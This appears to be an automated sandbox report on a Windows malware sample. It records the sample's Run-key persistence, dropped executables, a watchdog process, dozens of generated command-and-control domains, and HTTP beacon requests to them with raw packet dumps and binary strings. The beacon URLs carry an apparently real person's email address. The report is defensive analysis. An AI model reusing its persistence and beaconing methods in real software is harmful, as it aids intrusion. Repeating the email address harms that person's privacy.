Analysis Date | 2015-01-16 22:51:55 |
---|---|
MD5 | d080f15eb2d4df1a86f03a103b3c7f95 |
SHA1 | e38b2e5e8ea3b299d0d964b640a820ade8bc5e8e |
Static Details:
Runtime Details:
Screenshot | ![]() |
---|
Process
↳ C:\malware.exe
Registry | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\Networking AuthIP Files ➝ C:\Documents and Settings\Administrator\Application Data\hkiptxixelslzc\ugojmow.exe |
---|---|
Creates File | C:\Documents and Settings\Administrator\Application Data\hkiptxixelslzc\ugojmow.exe |
Creates Process | C:\Documents and Settings\Administrator\Application Data\hkiptxixelslzc\ugojmow.exe |
Process
↳ C:\Documents and Settings\Administrator\Application Data\hkiptxixelslzc\ugojmow.exe
Creates File | C:\Documents and Settings\Administrator\Application Data\hkiptxixelslzc\xysrdyvxaavi.exe |
---|---|
Creates File | \Device\Afd\Endpoint |
Creates File | C:\Documents and Settings\Administrator\Application Data\hkiptxixelslzc\ugojmow.rhaui |
Creates Process | WATCHDOGPROC "C:\Documents and Settings\Administrator\Application Data\hkiptxixelslzc\ugojmow.exe" |
Process
↳ WATCHDOGPROC "C:\Documents and Settings\Administrator\Application Data\hkiptxixelslzc\ugojmow.exe"
Network Details:
DNS | smokeinside.net Type: A 50.63.202.34 |
---|---|
DNS | partybright.net Type: A 184.168.221.24 |
DNS | freshpeople.net Type: A 91.206.201.140 |
DNS | summerready.net Type: A 72.167.191.69 |
DNS | summerpeople.net Type: A 65.254.248.141 |
DNS | waterready.net Type: A 64.74.223.38 |
DNS | waterpeople.net Type: A 66.151.181.49 |
DNS | partyready.net Type: A 8.5.1.51 |
DNS | partypeople.net Type: A 217.138.13.211 |
DNS | thoughtexplain.net Type: A |
DNS | waterexplain.net Type: A |
DNS | thoughtbright.net Type: A |
DNS | waterbright.net Type: A |
DNS | thoughtinside.net Type: A |
DNS | waterinside.net Type: A |
DNS | womaninstead.net Type: A |
DNS | smokeinstead.net Type: A |
DNS | womanexplain.net Type: A |
DNS | smokeexplain.net Type: A |
DNS | womanbright.net Type: A |
DNS | smokebright.net Type: A |
DNS | womaninside.net Type: A |
DNS | partyinstead.net Type: A |
DNS | fightinstead.net Type: A |
DNS | partyexplain.net Type: A |
DNS | fightexplain.net Type: A |
DNS | fightbright.net Type: A |
DNS | partyinside.net Type: A |
DNS | fightinside.net Type: A |
DNS | freshready.net Type: A |
DNS | experienceready.net Type: A |
DNS | freshbrown.net Type: A |
DNS | experiencebrown.net Type: A |
DNS | experiencepeople.net Type: A |
DNS | freshdaughter.net Type: A |
DNS | experiencedaughter.net Type: A |
DNS | gentlemanready.net Type: A |
DNS | alreadyready.net Type: A |
DNS | gentlemanbrown.net Type: A |
DNS | alreadybrown.net Type: A |
DNS | gentlemanpeople.net Type: A |
DNS | alreadypeople.net Type: A |
DNS | gentlemandaughter.net Type: A |
DNS | alreadydaughter.net Type: A |
DNS | followready.net Type: A |
DNS | memberready.net Type: A |
DNS | followbrown.net Type: A |
DNS | memberbrown.net Type: A |
DNS | followpeople.net Type: A |
DNS | memberpeople.net Type: A |
DNS | followdaughter.net Type: A |
DNS | memberdaughter.net Type: A |
DNS | beginready.net Type: A |
DNS | knownready.net Type: A |
DNS | beginbrown.net Type: A |
DNS | knownbrown.net Type: A |
DNS | beginpeople.net Type: A |
DNS | knownpeople.net Type: A |
DNS | begindaughter.net Type: A |
DNS | knowndaughter.net Type: A |
DNS | crowdready.net Type: A |
DNS | summerbrown.net Type: A |
DNS | crowdbrown.net Type: A |
DNS | crowdpeople.net Type: A |
DNS | summerdaughter.net Type: A |
DNS | crowddaughter.net Type: A |
DNS | thoughtready.net Type: A |
DNS | thoughtbrown.net Type: A |
DNS | waterbrown.net Type: A |
DNS | thoughtpeople.net Type: A |
DNS | thoughtdaughter.net Type: A |
DNS | waterdaughter.net Type: A |
DNS | womanready.net Type: A |
DNS | smokeready.net Type: A |
DNS | womanbrown.net Type: A |
DNS | smokebrown.net Type: A |
DNS | womanpeople.net Type: A |
DNS | smokepeople.net Type: A |
DNS | womandaughter.net Type: A |
DNS | smokedaughter.net Type: A |
DNS | fightready.net Type: A |
DNS | partybrown.net Type: A |
DNS | fightbrown.net Type: A |
DNS | fightpeople.net Type: A |
DNS | partydaughter.net Type: A |
HTTP GET | http://smokeinside.net/forum/search.php?email=rburchfield@las-cruces.org&method=post User-Agent: |
HTTP GET | http://partybright.net/forum/search.php?email=rburchfield@las-cruces.org&method=post User-Agent: |
HTTP GET | http://freshpeople.net/forum/search.php?email=rburchfield@las-cruces.org&method=post User-Agent: |
HTTP GET | http://summerready.net/forum/search.php?email=rburchfield@las-cruces.org&method=post User-Agent: |
HTTP GET | http://summerpeople.net/forum/search.php?email=rburchfield@las-cruces.org&method=post User-Agent: |
HTTP GET | http://waterready.net/forum/search.php?email=rburchfield@las-cruces.org&method=post User-Agent: |
HTTP GET | http://waterpeople.net/forum/search.php?email=rburchfield@las-cruces.org&method=post User-Agent: |
HTTP GET | http://partyready.net/forum/search.php?email=rburchfield@las-cruces.org&method=post User-Agent: |
HTTP GET | http://partypeople.net/forum/search.php?email=rburchfield@las-cruces.org&method=post User-Agent: |
Flows TCP | 192.168.1.1:1031 ➝ 50.63.202.34:80 |
Flows TCP | 192.168.1.1:1032 ➝ 184.168.221.24:80 |
Flows TCP | 192.168.1.1:1033 ➝ 91.206.201.140:80 |
Flows TCP | 192.168.1.1:1034 ➝ 72.167.191.69:80 |
Flows TCP | 192.168.1.1:1035 ➝ 65.254.248.141:80 |
Flows TCP | 192.168.1.1:1036 ➝ 64.74.223.38:80 |
Flows TCP | 192.168.1.1:1037 ➝ 66.151.181.49:80 |
Flows TCP | 192.168.1.1:1038 ➝ 8.5.1.51:80 |
Flows TCP | 192.168.1.1:1039 ➝ 217.138.13.211:80 |
Raw Pcap
0x00000000 (00000) 47455420 2f666f72 756d2f73 65617263 GET /forum/searc 0x00000010 (00016) 682e7068 703f656d 61696c3d 72627572 h.php?email=rbur 0x00000020 (00032) 63686669 656c6440 6c61732d 63727563 chfield@las-cruc 0x00000030 (00048) 65732e6f 7267266d 6574686f 643d706f es.org&method=po 0x00000040 (00064) 73742048 5454502f 312e300d 0a416363 st HTTP/1.0..Acc 0x00000050 (00080) 6570743a 202a2f2a 0d0a436f 6e6e6563 ept: */*..Connec 0x00000060 (00096) 74696f6e 3a20636c 6f73650d 0a486f73 tion: close..Hos 0x00000070 (00112) 743a2073 6d6f6b65 696e7369 64652e6e t: smokeinside.n 0x00000080 (00128) 65740d0a 0d0a et.... 0x00000000 (00000) 47455420 2f666f72 756d2f73 65617263 GET /forum/searc 0x00000010 (00016) 682e7068 703f656d 61696c3d 72627572 h.php?email=rbur 0x00000020 (00032) 63686669 656c6440 6c61732d 63727563 chfield@las-cruc 0x00000030 (00048) 65732e6f 7267266d 6574686f 643d706f es.org&method=po 0x00000040 (00064) 73742048 5454502f 312e300d 0a416363 st HTTP/1.0..Acc 0x00000050 (00080) 6570743a 202a2f2a 0d0a436f 6e6e6563 ept: */*..Connec 0x00000060 (00096) 74696f6e 3a20636c 6f73650d 0a486f73 tion: close..Hos 0x00000070 (00112) 743a2070 61727479 62726967 68742e6e t: partybright.n 0x00000080 (00128) 65740d0a 0d0a et.... 0x00000000 (00000) 47455420 2f666f72 756d2f73 65617263 GET /forum/searc 0x00000010 (00016) 682e7068 703f656d 61696c3d 72627572 h.php?email=rbur 0x00000020 (00032) 63686669 656c6440 6c61732d 63727563 chfield@las-cruc 0x00000030 (00048) 65732e6f 7267266d 6574686f 643d706f es.org&method=po 0x00000040 (00064) 73742048 5454502f 312e300d 0a416363 st HTTP/1.0..Acc 0x00000050 (00080) 6570743a 202a2f2a 0d0a436f 6e6e6563 ept: */*..Connec 0x00000060 (00096) 74696f6e 3a20636c 6f73650d 0a486f73 tion: close..Hos 0x00000070 (00112) 743a2066 72657368 70656f70 6c652e6e t: freshpeople.n 0x00000080 (00128) 65740d0a 0d0a et.... 0x00000000 (00000) 47455420 2f666f72 756d2f73 65617263 GET /forum/searc 0x00000010 (00016) 682e7068 703f656d 61696c3d 72627572 h.php?email=rbur 0x00000020 (00032) 63686669 656c6440 6c61732d 63727563 chfield@las-cruc 0x00000030 (00048) 65732e6f 7267266d 6574686f 643d706f es.org&method=po 0x00000040 (00064) 73742048 5454502f 312e300d 0a416363 st HTTP/1.0..Acc 0x00000050 (00080) 6570743a 202a2f2a 0d0a436f 6e6e6563 ept: */*..Connec 0x00000060 (00096) 74696f6e 3a20636c 6f73650d 0a486f73 tion: close..Hos 0x00000070 (00112) 743a2073 756d6d65 72726561 64792e6e t: summerready.n 0x00000080 (00128) 65740d0a 0d0a et.... 0x00000000 (00000) 47455420 2f666f72 756d2f73 65617263 GET /forum/searc 0x00000010 (00016) 682e7068 703f656d 61696c3d 72627572 h.php?email=rbur 0x00000020 (00032) 63686669 656c6440 6c61732d 63727563 chfield@las-cruc 0x00000030 (00048) 65732e6f 7267266d 6574686f 643d706f es.org&method=po 0x00000040 (00064) 73742048 5454502f 312e300d 0a416363 st HTTP/1.0..Acc 0x00000050 (00080) 6570743a 202a2f2a 0d0a436f 6e6e6563 ept: */*..Connec 0x00000060 (00096) 74696f6e 3a20636c 6f73650d 0a486f73 tion: close..Hos 0x00000070 (00112) 743a2073 756d6d65 7270656f 706c652e t: summerpeople. 0x00000080 (00128) 6e65740d 0a0d0a net.... 0x00000000 (00000) 47455420 2f666f72 756d2f73 65617263 GET /forum/searc 0x00000010 (00016) 682e7068 703f656d 61696c3d 72627572 h.php?email=rbur 0x00000020 (00032) 63686669 656c6440 6c61732d 63727563 chfield@las-cruc 0x00000030 (00048) 65732e6f 7267266d 6574686f 643d706f es.org&method=po 0x00000040 (00064) 73742048 5454502f 312e300d 0a416363 st HTTP/1.0..Acc 0x00000050 (00080) 6570743a 202a2f2a 0d0a436f 6e6e6563 ept: */*..Connec 0x00000060 (00096) 74696f6e 3a20636c 6f73650d 0a486f73 tion: close..Hos 0x00000070 (00112) 743a2077 61746572 72656164 792e6e65 t: waterready.ne 0x00000080 (00128) 740d0a0d 0a0d0a t...... 0x00000000 (00000) 47455420 2f666f72 756d2f73 65617263 GET /forum/searc 0x00000010 (00016) 682e7068 703f656d 61696c3d 72627572 h.php?email=rbur 0x00000020 (00032) 63686669 656c6440 6c61732d 63727563 chfield@las-cruc 0x00000030 (00048) 65732e6f 7267266d 6574686f 643d706f es.org&method=po 0x00000040 (00064) 73742048 5454502f 312e300d 0a416363 st HTTP/1.0..Acc 0x00000050 (00080) 6570743a 202a2f2a 0d0a436f 6e6e6563 ept: */*..Connec 0x00000060 (00096) 74696f6e 3a20636c 6f73650d 0a486f73 tion: close..Hos 0x00000070 (00112) 743a2077 61746572 70656f70 6c652e6e t: waterpeople.n 0x00000080 (00128) 65740d0a 0d0a0a et..... 0x00000000 (00000) 47455420 2f666f72 756d2f73 65617263 GET /forum/searc 0x00000010 (00016) 682e7068 703f656d 61696c3d 72627572 h.php?email=rbur 0x00000020 (00032) 63686669 656c6440 6c61732d 63727563 chfield@las-cruc 0x00000030 (00048) 65732e6f 7267266d 6574686f 643d706f es.org&method=po 0x00000040 (00064) 73742048 5454502f 312e300d 0a416363 st HTTP/1.0..Acc 0x00000050 (00080) 6570743a 202a2f2a 0d0a436f 6e6e6563 ept: */*..Connec 0x00000060 (00096) 74696f6e 3a20636c 6f73650d 0a486f73 tion: close..Hos 0x00000070 (00112) 743a2070 61727479 72656164 792e6e65 t: partyready.ne 0x00000080 (00128) 740d0a0d 0a0a0a t...... 0x00000000 (00000) 47455420 2f666f72 756d2f73 65617263 GET /forum/searc 0x00000010 (00016) 682e7068 703f656d 61696c3d 72627572 h.php?email=rbur 0x00000020 (00032) 63686669 656c6440 6c61732d 63727563 chfield@las-cruc 0x00000030 (00048) 65732e6f 7267266d 6574686f 643d706f es.org&method=po 0x00000040 (00064) 73742048 5454502f 312e300d 0a416363 st HTTP/1.0..Acc 0x00000050 (00080) 6570743a 202a2f2a 0d0a436f 6e6e6563 ept: */*..Connec 0x00000060 (00096) 74696f6e 3a20636c 6f73650d 0a486f73 tion: close..Hos 0x00000070 (00112) 743a2070 61727479 70656f70 6c652e6e t: partypeople.n 0x00000080 (00128) 65740d0a 0d0a0a et.....
Strings
. . -E- -0 -0010+-0 0 -0 CC .00-+ . -e- . \ 00 . :\ :.. ...........?- 0 0 0 0 - . u E(null) H ((((( H h(((( H jjjjh KERNEL32.DLL mscoree.dll TBDB !"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\]^_`abcdefghijklmnopqrstuvwxyz{|}~ !"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`abcdefghijklmnopqrstuvwxyz{|}~ !"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~ 0A@@Ju 0SSSSS 0WWWWW 1_JXx/ 1#QNAN 1#SNAN 5f>}hc 8D$:tC 8VVVVV abcdefghijklmnopqrstuvwxyz ABCDEFGHIJKLMNOPQRSTUVWXYZ ADVAPI32.dll An application has made an attempt to load the C runtime library incorrectly. <at9<rt,<wt - Attempt to initialize the CRT more than once. - Attempt to use MSIL code from this assembly during native code initialization August .?AVbad_alloc@std@@ .?AVbad_exception@std@@ .?AVexception@std@@ .?AVlength_error@std@@ .?AVlogic_error@std@@ .?AVout_of_range@std@@ .?AVtype_info@@ bad allocation bad exception Base Class Array' Base Class Descriptor at ( __based( BeginPaint __cdecl Class Hierarchy Descriptor' CloseClipboard CloseHandle __clrcall CompareStringA CompareStringW Complete Object Locator' CONOUT$ `copy constructor closure' CopyFileA CorExitProcess CreateDirectoryA CreateEventA CreateFileA CreateIconFromResourceEx CreateProcessA CreateStreamOnHGlobal CreateThread CreateToolhelp32Snapshot CreateWindowExA - CRT not initialized D$,_^][ D$$_^][ D$0_^][3 D$4UV3 @.data dddd, MMMM dd, yyyy D$\+D$TQ+ D$`+D$X+ December DecodePointer `default constructor closure' DefWindowProcA delete delete[] Delete DeleteCriticalSection DispatchMessageA D$LPQW D$LPSW D$LPSWQ DOMAIN error DPtoLP D$`UVW `dynamic atexit destructor for ' `dynamic initializer for ' `eh vector constructor iterator' `eh vector copy constructor iterator' `eh vector destructor iterator' `eh vector vbase constructor iterator' `eh vector vbase copy constructor iterator' EncodePointer EndPaint EndPath EnterCriticalSection ExitProcess __fastcall February FF<+FF FileTimeToLocalFileTime FileTimeToSystemTime FindClose FindFirstFileA - floating point support not loaded FlsAlloc FlsFree FlsGetValue FlsSetValue FlushFileBuffers ForceRemove *_F'Qn$A FreeEnvironmentStringsA FreeEnvironmentStringsW Friday ^F<-uB GAIsProcessorFeaturePresent GDI32.dll GetACP GetActiveWindow GetCommandLineA GetConsoleCP GetConsoleMode GetConsoleOutputCP GetCPInfo GetCurrentDirectoryA GetCurrentProcess GetCurrentProcessId GetCurrentThreadId GetDesktopWindow GetDeviceCaps GetDriveTypeA GetEnvironmentStrings GetEnvironmentStringsW GetEnvironmentVariableA GetFileSize GetFileType GetFullPathNameA GetLastActivePopup GetLastError GetLocaleInfoA GetMapMode GetMessageA GetModuleFileNameA GetModuleHandleA GetModuleHandleW GetOEMCP GetProcAddress GetProcessHeap GetProcessWindowStation GetSecurityDescriptorControl GetStartupInfoA GetStdHandle GetStockObject GetStringTypeA GetStringTypeW GetSystemTimeAsFileTime GetTempPathA GetTickCount GetTimeZoneInformation GetTitleBarInfo GetUserNameA GetUserObjectInformationA GetWindowDC GetWindowRect GetWindowThreadProcessId GlobalAlloc GlobalFree GlobalLock GlobalUnlock `h```` HeapAlloc HeapCreate HeapFree HeapReAlloc HeapSize `h`hhh HH:mm:ss HHtXHHt >If90t InitializeAcl InitializeCriticalSectionAndSpinCount InsertMenuA InterlockedDecrement InterlockedIncrement InvalidateRect invalid string position IsDebuggerPresent IsValidCodePage JanFebMarAprMayJunJulAugSepOctNovDec January j@j ^V j"^SSSSS KERNEL32 KERNEL32.dll /KU=Mu<?` L$0QPj LCMapStringA LCMapStringW LeaveCriticalSection L$l_^]3 L$LQRWPP L$LQRWS L$LQRWVV LoadCursorA LoadLibraryA `local static guard' `local static thread guard' `local vftable' `local vftable constructor closure' LPtoDP L$@QRP L$ QUV L t8rR L$ VSj `managed vector constructor iterator' `managed vector copy constructor iterator' `managed vector destructor iterator' M,\ b< mC0^0! MessageBoxA -M<Fx= Microsoft Visual C++ Runtime Library MM/dd/yy Monday MoveWindow MulDiv MultiByteToWideChar new[] njYV75 NoRemove - not enough space for arguments - not enough space for environment - not enough space for locale information - not enough space for lowio initialization - not enough space for _onexit/atexit table - not enough space for stdio initialization - not enough space for thread data November (null) October ole32.dll OLEAUT32.dll `omni callsig' OpenProcess operator OWB'g+! +@P1:B __pascal `placement delete closure' `placement delete[] closure' Please contact the application's support team for more information. PostQuitMessage PPPPPPPP Process32First Process32Next Program: <program name unknown> __ptr64 - pure virtual function call QQSVWd QueryPerformanceCounter RaiseException `.rdata ReadFile RegCloseKey RegisterClassExA RegOpenKeyA RegSetValueExA __restrict RK%m<f RtlUnwind runtime error Runtime Error! Saturday `scalar deleting destructor' ScaleViewportExtEx September SetDoubleClickTime SetEndOfFile SetEnvironmentVariableA SetEvent SetFileAttributesA SetFilePointer SetFocus SetHandleCount SetLastError SetMapMode SetStdHandle SetUnhandledExceptionFilter SetWindowTextA ShowWindow SING error SPSSSh s[S;7|G;w ^SSSSS __stdcall `string' string too long Sunday SunMonTueWedThuFriSat T$0jXW t$4WPQ T$8RPW t$$9-X_B TerminateProcess tGHt.Ht& +t HHt This application has requested the Runtime to terminate it in an unusual way. __thiscall This indicates a bug in your application. This indicates a bug in your application. It is most likely the result of calling an MSIL-compiled (/clr) function from a native constructor or from DllMain. !This program cannot be run in DOS mode. \)T"Hk T$hQPR Thursday < tK< tG TLOSS error T$LRPW T$LRSWVV TlsAlloc TlsFree TlsGetValue TlsSetValue <\tM</tI T$PPQRS tR99u2 TranslateMessage T$ RQQj T$\RVPW t"SS9] <+t(<-t$: t$<"u 3 Tuesday ;t$,v- t+WWVPV Type Descriptor' `typeof' >:u8FV `udt returning' - unable to initialize heap - unable to open console device __unaligned - unexpected heap error - unexpected multithread lock error UnhandledExceptionFilter UNICODE Unknown exception UpdateWindow UQPXY]Y[ URPQQh, USER32.dll USER32.DLL u[SSSP UTF-16LE v$;5,oB `vbase destructor' `vbtable' `vcall' `vector constructor iterator' `vector copy constructor iterator' `vector deleting destructor' `vector destructor iterator' `vector vbase constructor iterator' `vector vbase copy constructor iterator' `vftable' VirtualAlloc `virtual displacement map' VirtualFree v N+D$ #VVv\t _VVVVV VVVVVQRSSj WaitForSingleObject Wednesday WideCharToMultiByte WriteConsoleA WriteConsoleW WriteFile WS2_32.dll ^WWWWW XB,@XMv xppwpp xpxxxx <xtX<XtT >=Yt1j |ZJ,i{[h